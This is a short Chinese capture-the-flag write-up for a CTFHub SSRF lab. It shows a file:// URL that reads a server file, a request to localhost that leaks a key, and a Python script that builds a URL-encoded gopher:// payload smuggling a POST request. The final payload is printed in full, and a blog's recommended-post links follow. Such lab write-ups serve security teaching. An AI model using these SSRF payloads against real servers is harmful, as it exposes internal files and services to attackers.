CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

复制代码
?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

复制代码
?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

复制代码
python gopher.py

通过Gopher协议发送请求,得到了flag

复制代码
?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
LaughingZhu34 分钟前
Product Hunt 每日热榜 | 2026-04-03
数据库·人工智能·经验分享·神经网络·chatgpt·语音识别
宇飞林海2 小时前
Everything Claude Code (ECC) 超详细通俗介绍
经验分享
VLer.cn2 小时前
CVPR 2026 VideoSeek:仅用 1/300 帧数,长视频理解性能反超 GPT-5!
经验分享
瘾大侠3 小时前
HTB - DevArea
安全·web安全·网络安全
Chockmans3 小时前
春秋云境CVE-2018-3245
安全·web安全·网络安全·春秋云境·cve-2018-3245
菩提小狗4 小时前
每日安全情报报告 · 2026-04-03
网络安全·漏洞·cve·安全情报·每日安全
易知微EasyV数据可视化4 小时前
数字孪生+AI:青岛大学附属医院-立体监管院区运行,智能调度防范风险隐患
运维·人工智能·经验分享·数字孪生·空间智能
智能体架构手记4 小时前
31B 干掉 405B:Google Gemma 4,正在终结参数军备竞赛
经验分享